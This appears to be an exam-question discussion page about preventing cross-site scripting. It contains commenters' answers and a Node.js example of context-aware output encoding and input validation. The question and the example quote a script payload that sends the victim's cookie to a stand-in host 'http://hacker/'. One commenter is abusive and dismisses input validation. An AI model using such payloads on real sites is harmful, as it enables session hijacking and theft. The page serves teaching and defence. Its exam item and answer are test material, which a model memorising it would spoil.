Given the following code: <SCRIPT>var+img=new+Image();img.src=`http://hacker/%20+%20document.cookie;</SCRIPT> Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)
Encoding (commonly called “Output Encoding”) involves translating special characters into some different but equivalent form that is no longer dangerous in the target interpreter, for example translating the < character into the &lt; string when writing to an HTML page.
Output encoding and input sanitization are the best defenses against XSS. Therefore, I would go for C and E here.
This is an example of a Cross-Site Scripting (XSS) attack. To prevent this type of attack, the best methods would be:
C. Output encoding: This ensures that any data that is output to the browser is properly encoded, preventing the execution of malicious scripts.
E. Input validation: This involves validating and sanitizing user inputs to ensure they do not contain any malicious code.
A) A WAF (Web Application Firewall) could help to prevent XSS attacks, but that's not the definitive solution; the complete solution is C and E.
B) Parameterized queries are good for SQL injection; XSS is a different scenario.
D) Session tokens are good against session hijacking attacks, not XSS (Cross-Site Scripting).
F) Base64 encoding is primarily used to encode binary data into an ASCII string format, useful for transmitting data over media that are designed to deal with text. That's not effective in preventing an XSS attack.
I'm sad that you guys are stupid.
A. WAF - this can exactly prevent SQLi and XSS. Don't you understand its name?
B. This is used in SQLi, not XSS.
C. Output encoding - This changes malicious characters into a plain simple stupid string. This is good practice!
D. Session tokens are useless - XSS still works.
E. Ambiguous. The <script> may come from a URL parameter instead of form input, right? IT CAN COME FROM DOM XSS! INPUT VALIDATION IS USELESS
F. WTF encoding? If it is encoded, it can work when decoded, right?
Answer is C & E
Cross-site scripting prevention can generally be achieved via two layers of defense:
• Encode data on output
• Validate input on arrival
This was taken from this site: https://portswigger.net/web-security/cross-site-scripting/preventing
C. Output encoding: This involves properly encoding any user-generated or dynamic content that is being outputted on a web page. By encoding the content, special characters are converted into their corresponding HTML entities, preventing them from being interpreted as code by the browser.
E. Input validation: It is essential to validate and sanitize any user input received by the web application. Input validation involves checking the input for expected formats, length, and type, and rejecting or sanitizing any input that doesn't meet the specified criteria. This helps to prevent the injection of malicious code into the application.
The code shown is an example of a cross-site scripting (XSS) attack, where the attacker is attempting to steal the user's cookie by injecting a malicious script into a web page.
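The two chosen defences (C, output encoding; E, input validation) and the reason F (Base64) does not help, as an added example in Node.js that is not from the question, from ExamTopics, or from any commenter. PAYLOAD is my assumed URL-decoded reading of the script quoted in the question; the function names, the username allow-list and the greeting template are illustrative choices, not anything the exam or the page specifies.

```javascript
// Added example, written for this page; not code from the question, from ExamTopics,
// or from any commenter. Node.js only, no third-party modules. All inputs are constructed here.

// Assumption: this is the URL-decoded form of the payload quoted in the question
// (the exam text shows it with + and %20 URL-encoding).
const PAYLOAD =
  '<SCRIPT>var img=new Image();img.src="http://hacker/"+document.cookie;</SCRIPT>';

// --- Answer C: output encoding, chosen per output context -------------------------

// HTML body context: the five characters that can change HTML structure.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeForHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// HTML attribute context: encode everything except [A-Za-z0-9] as &#xHH;, so the
// value cannot break out of a quoted or unquoted attribute.
function encodeForHtmlAttribute(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu, (ch) => `&#x${ch.codePointAt(0).toString(16)};`);
}

// JavaScript string-literal context: \uXXXX-escape everything except [A-Za-z0-9].
// Works per UTF-16 code unit, so surrogate pairs become two escapes.
function encodeForJavaScriptString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g,
    (ch) => `\\u${ch.charCodeAt(0).toString(16).padStart(4, '0')}`);
}

// Vulnerable rendering: untrusted data concatenated straight into HTML.
function renderGreetingUnsafe(name) {
  return `<p>Hello ${name}</p><input name="display" value="${name}">`;
}

// Hardened rendering: the same template, each interpolation encoded for its context.
function renderGreetingSafe(name) {
  return `<p>Hello ${encodeForHtml(name)}</p>` +
    `<input name="display" value="${encodeForHtmlAttribute(name)}">`;
}

// --- Answer E: input validation on arrival (allow-list, not a deny-list of "<script>") --
const USERNAME_RE = /^[A-Za-z0-9_.-]{1,32}$/;
function validateUsername(input) {
  return typeof input === 'string' && USERNAME_RE.test(input);
}

// --- Why F (Base64) is not a defence: it is reversible, and it is decoded before use ---
function base64RoundTrip(s) {
  const encoded = Buffer.from(s, 'utf8').toString('base64');
  return Buffer.from(encoded, 'base64').toString('utf8');
}

// Does a rendered fragment still contain a live <script> tag?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('unsafe     :', renderGreetingUnsafe(PAYLOAD));
  console.log('safe       :', renderGreetingSafe(PAYLOAD));
  console.log('valid name?:', validateUsername(PAYLOAD));
  console.log('b64 same?  :', base64RoundTrip(PAYLOAD) === PAYLOAD);
}
```

Run it with `node` on any filename; the unsafe fragment carries the attacker's `<SCRIPT>` tag into the page while the safe one shows the same text as inert `&lt;SCRIPT&gt;`. The encoder must match the context the data lands in (body, attribute, JavaScript string), which is why one generic "encode" step is not enough. For the DOM XSS case raised above, the same rule applies on the client: write untrusted data with `textContent` or `setAttribute`, not `innerHTML`.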
Why isn't the answer C and E? (output encoding and input validation). Not sure how parameterized queries helps you here when this is not sql injection (it's xss)
PT1-002 Exam Questions